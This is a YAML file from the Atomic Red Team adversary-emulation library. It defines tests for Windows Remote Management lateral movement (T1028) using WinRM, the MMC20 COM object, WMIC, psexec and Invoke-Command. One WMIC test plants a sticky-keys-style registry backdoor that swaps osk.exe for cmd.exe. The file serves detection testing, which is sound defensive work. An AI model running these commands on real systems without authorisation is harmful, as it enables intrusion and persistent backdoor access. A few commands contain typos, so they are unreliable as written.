Files
atomic-red-team/atomics/T1028/T1028.yaml
T
Carrie Roberts 1bfefdacfc Add elevated (#542)
* provide elevation_required attribute

* provide elevation_required attribute

* provide elevation_required attribute
2019-09-03 07:34:42 -06:00

111 lines
2.7 KiB
YAML

---
attack_technique: T1028
display_name: Windows Remote Management
atomic_tests:
- name: Enable Windows Remote Management
description: |
Powershell Enable WinRM
supported_platforms:
- windows
executor:
name: powershell
elevation_required: true
command: |
Enable-PSRemoting -Force
- name: PowerShell Lateral Movement
description: |
Powershell lateral movement using the mmc20 application com object
Reference:
https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-application-lateral-movement-technique/
supported_platforms:
- windows
input_arguments:
computer_name:
description: Name of Computer
type: string
default: computer1
executor:
name: command_prompt
command: |
powershell.exe [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")
- name: WMIC Process Call Create
description: |
Utilize WMIC to start remote process
supported_platforms:
- windows
input_arguments:
user_name:
description: Username
type: String
default: DOMAIN\Administrator
password:
description: Password
type: String
default: P@ssw0rd1
computer_name:
description: Target Computer Name
type: String
default: Target
executor:
name: command_prompt
command: |
wmic /user:#{user_name} /password:#{password} /node:#{computer_name} process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"
- name: Psexec
description: |
Utilize psexec to start remote process
supported_platforms:
- windows
input_arguments:
user_name:
description: Username
type: String
default: DOMAIN\Administrator
password:
description: Password
type: String
default: P@ssw0rd1
computer_name:
description: Target Computer Name
type: String
default: Target
executor:
name: command_prompt
command: |
psexec \\host -u domain\user -p password -s cmd.exe
- name: Invoke-Command
description: |
Execute Invoke-command on remote host
supported_platforms:
- windows
input_arguments:
host_name:
description: Remote Windows Host Name
type: String
default: Test
remote_command:
description: Command to execute on remote Host
type: String
default: ipconfig
executor:
name: powershell
command: |
invoke-command -computer_name #{host_name} -scriptblock {#{remote_command}}